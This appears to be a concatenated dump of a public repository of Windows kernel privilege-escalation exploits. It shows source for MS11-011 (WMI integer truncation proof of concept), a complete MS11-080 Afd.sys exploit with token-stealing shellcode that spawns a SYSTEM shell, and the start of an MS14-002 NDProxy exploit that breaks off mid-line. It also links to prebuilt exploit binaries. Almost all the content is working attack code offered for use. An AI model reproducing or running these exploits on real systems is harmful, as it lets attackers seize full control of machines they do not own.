https://raw.githubusercontent.com/abatchy17/WindowsExploits/5e9c25cda54fe33fb6e1fd3ae60512a1113b41df/MS10-059 - Chimichurri/MS10-059.exe -------------------------------------------------------------------------------- /MS11-011/16262.c: -------------------------------------------------------------------------------- 1 | /* 2 | # Exploit Title: MS11-011(CVE-2011-0045): MS Windows XP WmiTraceMessageVa Integer Truncation Vulnerability PoC 3 | # Date: 2011-03-01 4 | # Author: Nikita Tarakanov (CISS Research Team) 5 | # Software Link: 6 | # Version: prior to MS11-011 7 | # Tested on: Win XP SP3 8 | # CVE : CVE-2011-0045 9 | # Status : Patched 10 | # Binary Analysis: http://cissrt.blogspot.com/2011/02/cve-2011-0045-ms-windows-xp.html 11 | */ 12 | 13 | 14 | 15 | 16 | #include 17 | #include 18 | #include 19 | #include 20 | #include 21 | #include 22 | 23 | 24 | 25 | 26 | #define WmiTraceMessageCode 40 27 | #define WmiCreateUMLogger 84 28 | #define WmiStartLoggerCode 32 29 | 30 | #define IOCTL_WMI_TRACE_MESSAGE \ 31 | CTL_CODE(FILE_DEVICE_UNKNOWN, WmiTraceMessageCode, 32 | METHOD_NEITHER, FILE_WRITE_ACCESS) 33 | 34 | /* 35 | #define CTL_CODE( DeviceType, Function, Method, Access ) ( \ 36 | ((DeviceType) << 16) | ((Access) << 14) | ((Function) << 2) | (Method) \ 37 | ) 38 | 39 | #define IOCTL_WMI_TRACE_MESSAGE \ 40 | CTL_CODE(FILE_DEVICE_UNKNOWN, WmiTraceMessageCode, 41 | METHOD_NEITHER, FILE_WRITE_ACCESS) 42 | 43 | #define IOCTL_WMI_CREATE_UM_LOGGER CTL_CODE(FILE_DEVICE_UNKNOWN, 44 | WmiCreateUMLogger, METHOD_BUFFERED, FILE_READ_ACCESS) 45 | 46 | #define IOCTL_WMI_START_LOGGER \ 47 | CTL_CODE(FILE_DEVICE_UNKNOWN, WmiStartLoggerCode, 48 | METHOD_BUFFERED, FILE_ANY_ACCESS) 49 | 50 | 51 | 52 | typedef struct _UNICODE_STRING { 53 | USHORT Length; 54 | USHORT MaximumLength; 55 | PWSTR Buffer; 56 | } UNICODE_STRING; 57 | typedef UNICODE_STRING *PUNICODE_STRING; 58 | 59 | typedef struct _STRING64 { 60 | USHORT Length; 61 | USHORT MaximumLength; 62 | ULONGLONG Buffer; 63 | } STRING64; 64 | typedef STRING64 *PSTRING64; 65 | 66 | typedef STRING64 UNICODE_STRING64; 67 | typedef UNICODE_STRING64 *PUNICODE_STRING64; 68 | 69 | 70 | // 71 | // WNODE definition 72 | typedef struct _WNODE_HEADER 73 | { 74 | ULONG BufferSize; // Size of entire buffer inclusive of this 75 | ULONG 76 | ULONG ProviderId; // Provider Id of driver returning this buffer 77 | union 78 | { 79 | ULONG64 HistoricalContext; // Logger use 80 | struct 81 | { 82 | ULONG Version; // Reserved 83 | ULONG Linkage; // Linkage field reserved for WMI 84 | }; 85 | }; 86 | 87 | union 88 | { 89 | ULONG CountLost; // Reserved 90 | HANDLE KernelHandle; // Kernel handle for data block 91 | LARGE_INTEGER TimeStamp; // Timestamp as returned in units of 100ns 92 | // since 1/1/1601 93 | }; 94 | GUID Guid; // Guid for data block returned with results 95 | ULONG ClientContext; 96 | ULONG Flags; // Flags, see below 97 | } WNODE_HEADER, *PWNODE_HEADER; 98 | 99 | // 100 | // Logger configuration and running statistics. This structure is used 101 | // by WMI.DLL to convert to UNICODE_STRING 102 | // 103 | // begin_wmikm 104 | typedef struct _WMI_LOGGER_INFORMATION { 105 | WNODE_HEADER Wnode; // Had to do this since wmium.h comes later 106 | // 107 | // data provider by caller 108 | ULONG BufferSize; // buffer size for logging (in 109 | kbytes) 110 | ULONG MinimumBuffers; // minimum to preallocate 111 | ULONG MaximumBuffers; // maximum buffers allowed 112 | ULONG MaximumFileSize; // maximum logfile size (in MBytes) 113 | ULONG LogFileMode; // sequential, circular 114 | ULONG FlushTimer; // buffer flush timer, in seconds 115 | ULONG EnableFlags; // trace enable flags 116 | LONG AgeLimit; // aging decay time, in minutes 117 | ULONG Wow; // TRUE if the logger started 118 | under WOW64 119 | union { 120 | HANDLE LogFileHandle; // handle to logfile 121 | ULONG64 LogFileHandle64; 122 | }; 123 | 124 | // data returned to caller 125 | // end_wmikm 126 | union { 127 | // begin_wmikm 128 | ULONG NumberOfBuffers; // no of buffers in use 129 | // end_wmikm 130 | ULONG InstanceCount; // Number of Provider Instances 131 | }; 132 | union { 133 | // begin_wmikm 134 | ULONG FreeBuffers; // no of buffers free 135 | // end_wmikm 136 | ULONG InstanceId; // Current Provider's Id for 137 | UmLogger 138 | }; 139 | union { 140 | // begin_wmikm 141 | ULONG EventsLost; // event records lost 142 | // end_wmikm 143 | ULONG NumberOfProcessors; // Passed on to UmLogger 144 | }; 145 | // begin_wmikm 146 | ULONG BuffersWritten; // no of buffers written to file 147 | ULONG LogBuffersLost; // no of logfile write failures 148 | ULONG RealTimeBuffersLost; // no of rt delivery failures 149 | union { 150 | HANDLE LoggerThreadId; // thread id of Logger 151 | ULONG64 LoggerThreadId64; // thread is of Logger 152 | }; 153 | union { 154 | UNICODE_STRING LogFileName; // used only in WIN64 155 | UNICODE_STRING64 LogFileName64; // Logfile name: only in WIN32 156 | }; 157 | 158 | // mandatory data provided by caller 159 | union { 160 | UNICODE_STRING LoggerName; // Logger instance name in WIN64 161 | UNICODE_STRING64 LoggerName64; // Logger Instance name in WIN32 162 | }; 163 | 164 | // private 165 | union { 166 | PVOID Checksum; 167 | ULONG64 Checksum64; 168 | }; 169 | union { 170 | PVOID LoggerExtension; 171 | ULONG64 LoggerExtension64; 172 | }; 173 | } WMI_LOGGER_INFORMATION, *PWMI_LOGGER_INFORMATION; 174 | 175 | */ 176 | 177 | typedef struct _WMI_TRACE_MESSAGE_PACKET { // must be ULONG!! 178 | USHORT MessageNumber; // The message Number, index 179 | of messages by GUID 180 | // Or ComponentID 181 | USHORT OptionFlags ; // Flags associated with the 182 | message 183 | } WMI_TRACE_MESSAGE_PACKET, *PWMI_TRACE_MESSAGE_PACKET; 184 | 185 | typedef struct _MESSAGE_TRACE_HEADER { 186 | union { 187 | ULONG Marker; 188 | struct { 189 | USHORT Size; // Total Size of the 190 | message including header 191 | UCHAR Reserved; // Unused and reserved 192 | UCHAR Version; // The message structure 193 | type (TRACE_MESSAGE_FLAG) 194 | }; 195 | }; 196 | union { 197 | ULONG Header; // both sizes must be the same! 198 | WMI_TRACE_MESSAGE_PACKET Packet; 199 | }; 200 | } MESSAGE_TRACE_HEADER, *PMESSAGE_TRACE_HEADER; 201 | 202 | typedef struct _MESSAGE_TRACE { 203 | MESSAGE_TRACE_HEADER MessageHeader ; 204 | UCHAR Data ; 205 | } MESSAGE_TRACE, *PMESSAGE_TRACE ; 206 | 207 | // 208 | // Structure used to pass user log messages to the kernel 209 | // 210 | typedef struct _MESSAGE_TRACE_USER { 211 | MESSAGE_TRACE_HEADER MessageHeader ; 212 | ULONG MessageFlags ; 213 | ULONG64 LoggerHandle ; 214 | GUID MessageGuid ; 215 | ULONG DataSize ; 216 | UCHAR Data ; 217 | } MESSAGE_TRACE_USER, *PMESSAGE_TRACE_USER ; 218 | 219 | /* 220 | 221 | 222 | typedef struct _OBJECT_ATTRIBUTES { 223 | ULONG Length; 224 | HANDLE RootDirectory; 225 | PUNICODE_STRING ObjectName; 226 | ULONG Attributes; 227 | PVOID SecurityDescriptor; // Points to type SECURITY_DESCRIPTOR 228 | PVOID SecurityQualityOfService; // Points to type 229 | SECURITY_QUALITY_OF_SERVICE 230 | } OBJECT_ATTRIBUTES; 231 | typedef OBJECT_ATTRIBUTES *POBJECT_ATTRIBUTES; 232 | 233 | typedef union 234 | { 235 | HANDLE Handle; 236 | ULONG64 Handle64; 237 | ULONG32 Handle32; 238 | } HANDLE3264, *PHANDLE3264; 239 | 240 | typedef struct 241 | { 242 | IN POBJECT_ATTRIBUTES ObjectAttributes; 243 | IN GUID ControlGuid; 244 | OUT HANDLE3264 ReplyHandle; 245 | OUT ULONG ReplyCount; 246 | } WMICREATEUMLOGGER, *PWMICREATEUMLOGGER; 247 | 248 | */ 249 | 250 | //#define LOGFILE_PATH L"" 251 | #define LOGFILE_PATH L"test.etl" 252 | //#define LOGSESSION_NAME L"My Event Trace Session" 253 | #define LOGSESSION_NAME L"test" 254 | 255 | // GUID that identifies your trace session. 256 | // Remember to create your own session GUID. 257 | 258 | // {94BE0BF2-885F-4972-8461-A7D83B53F1AD} 259 | static const GUID SessionGuid = 260 | { 0x94be0bf2, 0x885f, 0x4972, { 0x84, 0x61, 0xa7, 0xd8, 0x3b, 0x53, 261 | 0xf1, 0xad } }; 262 | 263 | // GUID that identifies the provider that you want 264 | // to enable to your session. 265 | 266 | // {7C214FB1-9CAC-4b8d-BAED-7BF48BF63BB3} 267 | static const GUID ProviderGuid = 268 | { 0x7c214fb1, 0x9cac, 0x4b8d, { 0xba, 0xed, 0x7b, 0xf4, 0x8b, 0xf6, 269 | 0x3b, 0xb3 } }; 270 | 271 | int trigger(HANDLE hDevice); 272 | int start_usermode_logger(HANDLE hDevice); 273 | int start_logger(HANDLE hDevice); 274 | HANDLE open_device(); 275 | 276 | int main(int argc, char **argv) 277 | { 278 | HANDLE hDevice; 279 | if((hDevice = open_device()) == INVALID_HANDLE_VALUE){ 280 | printf("open_device failed!\n"); 281 | return 0; 282 | } 283 | 284 | if(!start_usermode_logger(hDevice)){ 285 | printf("start_usermode_logger failed!\n"); 286 | return 0; 287 | } 288 | 289 | /* 290 | if(!start_logger(hDevice)){ 291 | printf("start_logger failed!\n"); 292 | return 0; 293 | } 294 | */ 295 | trigger(hDevice); 296 | return 0; 297 | } 298 | 299 | HANDLE open_device() 300 | { 301 | char deviceName[] = "\\\\.\\WMIDataDevice"; 302 | HANDLE hDevice; 303 | if ( (hDevice = CreateFileA(deviceName, 304 | GENERIC_READ|GENERIC_WRITE, 305 | //0, 306 | 0, 307 | 0, 308 | OPEN_EXISTING, 309 | 0, 310 | NULL) ) != INVALID_HANDLE_VALUE ) 311 | { 312 | printf("Device succesfully opened!\n"); 313 | return hDevice; 314 | } 315 | else 316 | { 317 | printf("Error: Error opening device at NULL premission\n"); 318 | return INVALID_HANDLE_VALUE; 319 | } 320 | } 321 | 322 | int start_usermode_logger(HANDLE hDevice) 323 | { 324 | ULONG status = ERROR_SUCCESS; 325 | TRACEHANDLE SessionHandle = 0; 326 | EVENT_TRACE_PROPERTIES* pSessionProperties = NULL; 327 | ULONG BufferSize = 0; 328 | BOOL TraceOn = TRUE; 329 | 330 | // Allocate memory for the session properties. The memory must 331 | // be large enough to include the log file name and session name, 332 | // which get appended to the end of the session properties structure. 333 | 334 | BufferSize = sizeof(EVENT_TRACE_PROPERTIES) + sizeof(LOGFILE_PATH) + 335 | sizeof(LOGSESSION_NAME); 336 | pSessionProperties = (EVENT_TRACE_PROPERTIES*) malloc(BufferSize); 337 | if (NULL == pSessionProperties) 338 | { 339 | wprintf(L"Unable to allocate %d bytes for properties 340 | structure.\n", BufferSize); 341 | return 0; 342 | } 343 | 344 | // Set the session properties. You only append the log file name 345 | // to the properties structure; the StartTrace function appends 346 | // the session name for you. 347 | 348 | ZeroMemory(pSessionProperties, BufferSize); 349 | pSessionProperties->Wnode.BufferSize = BufferSize; 350 | pSessionProperties->Wnode.Flags = WNODE_FLAG_TRACED_GUID; 351 | pSessionProperties->Wnode.ClientContext = 1; //QPC clock resolution 352 | pSessionProperties->Wnode.Guid = SessionGuid; 353 | pSessionProperties->LogFileMode = EVENT_TRACE_FILE_MODE_CIRCULAR | 354 | EVENT_TRACE_USE_PAGED_MEMORY; 355 | pSessionProperties->MaximumFileSize = 5; // 5 MB 356 | pSessionProperties->LoggerNameOffset = sizeof(EVENT_TRACE_PROPERTIES); 357 | pSessionProperties->LogFileNameOffset = 358 | sizeof(EVENT_TRACE_PROPERTIES) + sizeof(LOGSESSION_NAME); 359 | StringCbCopy((LPWSTR)((char*)pSessionProperties + 360 | pSessionProperties->LogFileNameOffset), sizeof(LOGFILE_PATH), LOGFILE_PATH); 361 | 362 | // Create the trace session. 363 | 364 | status = StartTrace((PTRACEHANDLE)&SessionHandle, LOGSESSION_NAME, 365 | pSessionProperties); 366 | if (ERROR_SUCCESS != status) 367 | { 368 | wprintf(L"StartTrace() failed with %lu\n", status); 369 | return 0; 370 | } 371 | 372 | // Enable the providers that you want to log events to your session. 373 | 374 | status = EnableTrace( 375 | TraceOn, // TRUE enables the provider 376 | 0, // No enable flags 377 | TRACE_LEVEL_INFORMATION, // Enable informational, warning, error 378 | and critical events 379 | (LPCGUID)&ProviderGuid, // Provider to enable 380 | SessionHandle // Session handle from StartTrace 381 | ); 382 | 383 | if (ERROR_SUCCESS != status) 384 | { 385 | wprintf(L"EnableTrace() failed with %lu\n", status); 386 | TraceOn = FALSE; 387 | return 0; 388 | } 389 | 390 | wprintf(L"Run the provider application. Then hit any key to stop the 391 | session.\n"); 392 | return 1; 393 | } 394 | 395 | int trigger(HANDLE hDevice) 396 | { 397 | 398 | DWORD cb, inlen, outlen; 399 | char *buff, *buff_out = NULL; 400 | 401 | DWORD result = 0; 402 | unsigned char str[] = "fuckdata"; 403 | 404 | MESSAGE_TRACE_USER Message; 405 | 406 | Message.MessageHeader.Marker = 0xBEBEBEBE; 407 | Message.MessageHeader.Header = 0xEFEFEFEF; 408 | 409 | Message.MessageFlags = 0xC0C0DEDE; 410 | 411 | //Message.LoggerHandle = 0xC0DEC0DEDEADDEAD; 412 | //Message.LoggerHandle = 0xC0DEC0DE12340001;//last WORD should be in 413 | 1 < n < 40 414 | Message.LoggerHandle = 0xC0DEC0DE12340000;//last WORD should be in 1 415 | < n < 40 416 | 417 | Message.MessageGuid.Data1 = 0xC0DEDEAD; 418 | Message.MessageGuid.Data2 = 0xDEC0; 419 | Message.MessageGuid.Data3 = 0xDEDE; 420 | memcpy(Message.MessageGuid.Data4, str, 8); 421 | 422 | //Message.DataSize = 0xDEADBEEF; 423 | //Message.DataSize = 0x0000FFFE;//in fixed versioon should be < 0x1FD0 424 | Message.DataSize = 0x00010FF0;//in fixed versioon should be < 0x1FD0 425 | Message.Data = '0'; 426 | 427 | //DWORD ioctl = 0x2280A3; 428 | 429 | buff_out = (char*)malloc(0x2000); 430 | if(!buff_out){ 431 | printf("malloc failed"); 432 | return 0; 433 | } 434 | memset(buff_out, 0x0, 0x2000); 435 | 436 | cb = 0; 437 | buff = (char*)malloc(0x20000); 438 | if(!buff){ 439 | printf("malloc failed"); 440 | return 0; 441 | } 442 | memset(buff, 'A', 0x20000-1); 443 | 444 | 445 | 446 | outlen = 0x0; 447 | inlen = 0x15000; 448 | 449 | memcpy(buff, &Message, 0x30); 450 | //result = DeviceIoControl(hDevice, IOCTL_WMI_TRACE_MESSAGE, 451 | (LPVOID)&Message, inlen, (LPVOID)buff_out, outlen, &cb, NULL); 452 | for(int i =0; i< 0x40; i++){ 453 | Message.LoggerHandle++; 454 | memset(buff, 'A', 0x20000-1); 455 | memcpy(buff, &Message, 0x30); 456 | 457 | result = DeviceIoControl(hDevice, IOCTL_WMI_TRACE_MESSAGE, 458 | (LPVOID)buff, inlen, (LPVOID)buff_out, outlen, &cb, NULL); 459 | printf("ioctl = 0x%08X, id = %d, result = %d\n", 460 | IOCTL_WMI_TRACE_MESSAGE, i, result); 461 | } 462 | printf("done!"); 463 | free(buff); 464 | } 465 | -------------------------------------------------------------------------------- /MS11-011/MS11-011.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/abatchy17/WindowsExploits/5e9c25cda54fe33fb6e1fd3ae60512a1113b41df/MS11-011/MS11-011.exe -------------------------------------------------------------------------------- /MS11-046/MS11-046.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/abatchy17/WindowsExploits/5e9c25cda54fe33fb6e1fd3ae60512a1113b41df/MS11-046/MS11-046.exe -------------------------------------------------------------------------------- /MS11-062/MS11-062.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/abatchy17/WindowsExploits/5e9c25cda54fe33fb6e1fd3ae60512a1113b41df/MS11-062/MS11-062.exe -------------------------------------------------------------------------------- /MS11-080 - AFD.sys/MS11-080.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/abatchy17/WindowsExploits/5e9c25cda54fe33fb6e1fd3ae60512a1113b41df/MS11-080 - AFD.sys/MS11-080.exe -------------------------------------------------------------------------------- /MS11-080 - AFD.sys/MS11-080.py: -------------------------------------------------------------------------------- 1 | ################################################################################ 2 | ######### MS11-080 - CVE-2011-2005 Afd.sys Privilege Escalation Exploit ######## 3 | ######### Author: ryujin@offsec.com - Matteo Memelli ######## 4 | ######### Spaghetti & Pwnsauce ######## 5 | ######### yuck! 0xbaadf00d Elwood@mac&cheese.com ######## 6 | ######### ######## 7 | ######### Thx to dookie(lifesaver)2000ca, dijital1 and ronin ######## 8 | ######### for helping out! ######## 9 | ######### ######## 10 | ######### To my Master Shifu muts: ######## 11 | ######### "So that's it, I just need inner peace?" ;) ######## 12 | ######### ######## 13 | ######### Exploit tested on the following 32bits systems: ######## 14 | ######### Win XPSP3 Eng, Win 2K3SP2 Standard/Enterprise Eng ######## 15 | ################################################################################ 16 | 17 | from ctypes import (windll, CDLL, Structure, byref, sizeof, POINTER, 18 | c_char, c_short, c_ushort, c_int, c_uint, c_ulong, 19 | c_void_p, c_long, c_char_p) 20 | from ctypes.wintypes import HANDLE, DWORD 21 | import socket, time, os, struct, sys 22 | from optparse import OptionParser 23 | 24 | usage = "%prog -O TARGET_OS" 25 | parser = OptionParser(usage=usage) 26 | parser.add_option("-O", "--target-os", type="string", 27 | action="store", dest="target_os", 28 | help="Target OS. Accepted values: XP, 2K3") 29 | (options, args) = parser.parse_args() 30 | OS = options.target_os 31 | if not OS or OS.upper() not in ['XP','2K3']: 32 | parser.print_help() 33 | sys.exit() 34 | OS = OS.upper() 35 | 36 | kernel32 = windll.kernel32 37 | ntdll = windll.ntdll 38 | Psapi = windll.Psapi 39 | 40 | def findSysBase(drvname=None): 41 | ARRAY_SIZE = 1024 42 | myarray = c_ulong * ARRAY_SIZE 43 | lpImageBase = myarray() 44 | cb = c_int(1024) 45 | lpcbNeeded = c_long() 46 | drivername_size = c_long() 47 | drivername_size.value = 48 48 | Psapi.EnumDeviceDrivers(byref(lpImageBase), cb, byref(lpcbNeeded)) 49 | for baseaddy in lpImageBase: 50 | drivername = c_char_p("\x00"*drivername_size.value) 51 | if baseaddy: 52 | Psapi.GetDeviceDriverBaseNameA(baseaddy, drivername, 53 | drivername_size.value) 54 | if drvname: 55 | if drivername.value.lower() == drvname: 56 | print "[+] Retrieving %s info..." % drvname 57 | print "[+] %s base address: %s" % (drvname, hex(baseaddy)) 58 | return baseaddy 59 | else: 60 | if drivername.value.lower().find("krnl") !=-1: 61 | print "[+] Retrieving Kernel info..." 62 | print "[+] Kernel version:", drivername.value 63 | print "[+] Kernel base address: %s" % hex(baseaddy) 64 | return (baseaddy, drivername.value) 65 | return None 66 | 67 | print "[>] MS11-080 Privilege Escalation Exploit" 68 | print "[>] Matteo Memelli - ryujin@offsec.com" 69 | print "[>] Release Date 28/11/2011" 70 | 71 | WSAGetLastError = windll.Ws2_32.WSAGetLastError 72 | WSAGetLastError.argtypes = () 73 | WSAGetLastError.restype = c_int 74 | SOCKET = c_int 75 | WSASocket = windll.Ws2_32.WSASocketA 76 | WSASocket.argtypes = (c_int, c_int, c_int, c_void_p, c_uint, DWORD) 77 | WSASocket.restype = SOCKET 78 | closesocket = windll.Ws2_32.closesocket 79 | closesocket.argtypes = (SOCKET,) 80 | closesocket.restype = c_int 81 | connect = windll.Ws2_32.connect 82 | connect.argtypes = (SOCKET, c_void_p, c_int) 83 | connect.restype = c_int 84 | 85 | class sockaddr_in(Structure): 86 | _fields_ = [ 87 | ("sin_family", c_short), 88 | ("sin_port", c_ushort), 89 | ("sin_addr", c_ulong), 90 | ("sin_zero", c_char * 8), 91 | ] 92 | 93 | ## Create our deviceiocontrol socket handle 94 | client = WSASocket(socket.AF_INET, socket.SOCK_STREAM, socket.IPPROTO_TCP, 95 | None, 0, 0) 96 | if client == ~0: 97 | raise OSError, "WSASocket: %s" % (WSAGetLastError(),) 98 | try: 99 | addr = sockaddr_in() 100 | addr.sin_family = socket.AF_INET 101 | addr.sin_port = socket.htons(4455) 102 | addr.sin_addr = socket.htonl(0x7f000001) # 127.0.0.1 103 | ## We need to connect to a closed port, socket state must be CONNECTING 104 | connect(client, byref(addr), sizeof(addr)) 105 | except: 106 | closesocket(client) 107 | raise 108 | 109 | baseadd = c_int(0x1001) 110 | MEMRES = (0x1000 | 0x2000) 111 | PAGEEXE = 0x00000040 112 | Zerobits = c_int(0) 113 | RegionSize = c_int(0x1000) 114 | written = c_int(0) 115 | ## This will trigger the path to AfdRestartJoin 116 | irpstuff = ("\x41\x41\x41\x41\x42\x42\x42\x42" 117 | "\x00\x00\x00\x00\x44\x44\x44\x44" 118 | "\x01\x00\x00\x00" 119 | "\xe8\x00" + "4" + "\xf0\x00" + "\x45"*231) 120 | ## Allocate space for the input buffer 121 | dwStatus = ntdll.NtAllocateVirtualMemory(-1, 122 | byref(baseadd), 123 | 0x0, 124 | byref(RegionSize), 125 | MEMRES, 126 | PAGEEXE) 127 | # Copy input buffer to it 128 | kernel32.WriteProcessMemory(-1, 0x1000, irpstuff, 0x100, byref(written)) 129 | startPage = c_int(0x00020000) 130 | kernel32.VirtualProtect(startPage, 0x1000, PAGEEXE, byref(written)) 131 | ################################# KERNEL INFO ################################## 132 | lpDriver = c_char_p() 133 | lpPath = c_char_p() 134 | lpDrvAddress = c_long() 135 | (krnlbase, kernelver) = findSysBase() 136 | hKernel = kernel32.LoadLibraryExA(kernelver, 0, 1) 137 | HalDispatchTable = kernel32.GetProcAddress(hKernel, "HalDispatchTable") 138 | HalDispatchTable -= hKernel 139 | HalDispatchTable += krnlbase 140 | print "[+] HalDispatchTable address:", hex(HalDispatchTable) 141 | halbase = findSysBase("hal.dll") 142 | ## WinXP SP3 143 | if OS == "XP": 144 | HaliQuerySystemInformation = halbase+0x16bba # Offset for XPSP3 145 | HalpSetSystemInformation = halbase+0x19436 # Offset for XPSP3 146 | ## Win2k3 SP2 147 | else: 148 | HaliQuerySystemInformation = halbase+0x1fa1e # Offset for WIN2K3 149 | HalpSetSystemInformation = halbase+0x21c60 # Offset for WIN2K3 150 | print "[+] HaliQuerySystemInformation address:", hex(HaliQuerySystemInformation) 151 | print "[+] HalpSetSystemInformation address:", hex(HalpSetSystemInformation) 152 | 153 | ################################# EXPLOITATION ################################# 154 | shellcode_address_dep = 0x0002071e 155 | shellcode_address_nodep = 0x000207b8 156 | padding = "\x90"*2 157 | HalDispatchTable0x4 = HalDispatchTable + 0x4 158 | HalDispatchTable0x8 = HalDispatchTable + 0x8 159 | ## tokenbkaddr = 0x00020900 160 | if OS == "XP": 161 | _KPROCESS = "\x44" 162 | _TOKEN = "\xc8" 163 | _UPID = "\x84" 164 | _APLINKS = "\x88" 165 | else: 166 | _KPROCESS = "\x38" 167 | _TOKEN = "\xd8" 168 | _UPID = "\x94" 169 | _APLINKS = "\x98" 170 | 171 | restore_ptrs = "\x31\xc0" + \ 172 | "\xb8" + struct.pack("L", HalpSetSystemInformation) + \ 173 | "\xa3" + struct.pack("L", HalDispatchTable0x8) + \ 174 | "\xb8" + struct.pack("L", HaliQuerySystemInformation) + \ 175 | "\xa3" + struct.pack("L", HalDispatchTable0x4) 176 | tokenstealing = "\x52" +\ 177 | "\x53" +\ 178 | "\x33\xc0" +\ 179 | "\x64\x8b\x80\x24\x01\x00\x00" +\ 180 | "\x8b\x40" + _KPROCESS +\ 181 | "\x8b\xc8" +\ 182 | "\x8b\x98" + _TOKEN + "\x00\x00\x00" +\ 183 | "\x89\x1d\x00\x09\x02\x00" +\ 184 | "\x8b\x80" + _APLINKS + "\x00\x00\x00" +\ 185 | "\x81\xe8" + _APLINKS + "\x00\x00\x00" +\ 186 | "\x81\xb8" + _UPID + "\x00\x00\x00\x04\x00\x00\x00" +\ 187 | "\x75\xe8" +\ 188 | "\x8b\x90" + _TOKEN + "\x00\x00\x00" +\ 189 | "\x8b\xc1" +\ 190 | "\x89\x90" + _TOKEN + "\x00\x00\x00" +\ 191 | "\x5b" +\ 192 | "\x5a" +\ 193 | "\xc2\x10" 194 | restore_token = "\x52" +\ 195 | "\x33\xc0" +\ 196 | "\x64\x8b\x80\x24\x01\x00\x00" +\ 197 | "\x8b\x40" + _KPROCESS +\ 198 | "\x8b\x15\x00\x09\x02\x00" +\ 199 | "\x89\x90" + _TOKEN + "\x00\x00\x00" +\ 200 | "\x5a" +\ 201 | "\xc2\x10" 202 | 203 | shellcode = padding + restore_ptrs + tokenstealing 204 | shellcode_size = len(shellcode) 205 | orig_size = shellcode_size 206 | # Write shellcode in userspace (dep) 207 | kernel32.WriteProcessMemory(-1, shellcode_address_dep, shellcode, 208 | shellcode_size, byref(written)) 209 | # Write shellcode in userspace *(nodep) 210 | kernel32.WriteProcessMemory(-1, shellcode_address_nodep, shellcode, 211 | shellcode_size, byref(written)) 212 | ## Trigger Pointer Overwrite 213 | print "[*] Triggering AFDJoinLeaf pointer overwrite..." 214 | IOCTL = 0x000120bb # AFDJoinLeaf 215 | inputbuffer = 0x1004 216 | inputbuffer_size = 0x108 217 | outputbuffer_size = 0x0 # Bypass Probe for Write 218 | outputbuffer = HalDispatchTable0x4 + 0x1 # HalDispatchTable+0x4+1 219 | IoStatusBlock = c_ulong() 220 | NTSTATUS = ntdll.ZwDeviceIoControlFile(client, 221 | None, 222 | None, 223 | None, 224 | byref(IoStatusBlock), 225 | IOCTL, 226 | inputbuffer, 227 | inputbuffer_size, 228 | outputbuffer, 229 | outputbuffer_size 230 | ) 231 | ## Trigger shellcode 232 | inp = c_ulong() 233 | out = c_ulong() 234 | inp = 0x1337 235 | hola = ntdll.NtQueryIntervalProfile(inp, byref(out)) 236 | ## Spawn a system shell, w00t! 237 | print "[*] Spawning a SYSTEM shell..." 238 | os.system("cmd.exe /T:C0 /K cd c:\\windows\\system32") 239 | 240 | ############################## POST EXPLOITATION ############################### 241 | print "[*] Restoring token..." 242 | ## Restore the thingie 243 | shellcode = padding + restore_ptrs + restore_token 244 | shellcode_size = len(shellcode) 245 | trail_padding = (orig_size - shellcode_size) * "\x00" 246 | shellcode += trail_padding 247 | shellcode_size += (orig_size - shellcode_size) 248 | ## Write restore shellcode in userspace (dep) 249 | kernel32.WriteProcessMemory(-1, shellcode_address_dep, shellcode, 250 | shellcode_size, byref(written)) 251 | ## Write restore shellcode in userspace (nodep) 252 | kernel32.WriteProcessMemory(-1, shellcode_address_nodep, shellcode, 253 | shellcode_size, byref(written)) 254 | ## Overwrite HalDispatchTable once again 255 | NTSTATUS = ntdll.ZwDeviceIoControlFile(client, 256 | None, 257 | None, 258 | None, 259 | byref(IoStatusBlock), 260 | IOCTL, 261 | inputbuffer, 262 | inputbuffer_size, 263 | outputbuffer, 264 | outputbuffer_size 265 | ) 266 | ## Trigger restore shellcode 267 | hola = ntdll.NtQueryIntervalProfile(inp, byref(out)) 268 | print "[+] Restore done! Have a nice day :)" -------------------------------------------------------------------------------- /MS14-002/30014.py: -------------------------------------------------------------------------------- 1 | # NDPROXY Local SYSTEM privilege escalation 2 | # http://www.offensive-security.com 3 | # Tested on Windows XP SP3 4 | # http://www.offensive-security.com/vulndev/ndproxy-local-system-exploit-cve-2013-5065/ 5 | 6 | 7 | # Original crash ... null pointer dereference 8 | # Access violation - code c0000005 (!!! second chance !!!) 9 | # 00000038 ?? ??? 10 | 11 | from ctypes import * 12 | from ctypes.wintypes import * 13 | import os, sys 14 | 15 | kernel32 = windll.kernel32 16 | ntdll = windll.ntdll 17 | 18 | GENERIC_READ = 0x80000000 19 | GENERIC_WRITE = 0x40000000 20 | FILE_SHARE_READ = 0x00000001 21 | FILE_SHARE_WRITE = 0x00000002 22 | NULL = 0x0 23 | OPEN_EXISTING = 0x3 24 | PROCESS_VM_WRITE = 0x0020 25 | PROCESS_VM_READ = 0x0010 26 | MEM_COMMIT = 0x00001000 27 | MEM_RESERVE = 0x00002000 28 | MEM_FREE = 0x00010000 29 | PAGE_EXECUTE_READWRITE = 0x00000040 30 | PROCESS_ALL_ACCESS = 2097151 31 | FORMAT_MESSAGE_FROM_SYSTEM = 0x00001000 32 | baseadd = c_int(0x00000001) 33 | MEMRES = (0x1000 | 0x2000) 34 | MEM_DECOMMIT = 0x4000 35 | PAGEEXE = 0x00000040 36 | null_size = c_int(0x1000) 37 | STATUS_SUCCESS = 0 38 | 39 | def log(msg): 40 | print msg 41 | 42 | def getLastError(): 43 | """[-] Format GetLastError""" 44 | buf = create_string_buffer(2048) 45 | if kernel32.FormatMessageA(FORMAT_MESSAGE_FROM_SYSTEM, NULL, 46 | kernel32.GetLastError(), 0, 47 | buf, sizeof(buf), NULL): 48 | log(buf.value) 49 | else: 50 | log("[-] Unknown Error") 51 | 52 | print "[*] Microsoft Windows NDProxy CVE-2013-5065 0day" 53 | print "[*] Vulnerability found in the wild" 54 | print "[*] Coded by Offensive Security" 55 | 56 | tmp = ("\x00"*4)*5 + "\x25\x01\x03\x07" + "\x00"*4 + "\x34\x00\x00\x00" + "\x00"*(84-24) 57 | InBuf = c_char_p(tmp) 58 | 59 | dwStatus = ntdll.NtAllocateVirtualMemory(0xFFFFFFFF, byref(baseadd), 0x0, byref(null_size), MEMRES, PAGEEXE) 60 | if dwStatus != STATUS_SUCCESS: 61 | print "[+] Something went wrong while allocating the null paged memory: %s" % dwStatus 62 | getLastError() 63 | written = c_ulong() 64 | sh = 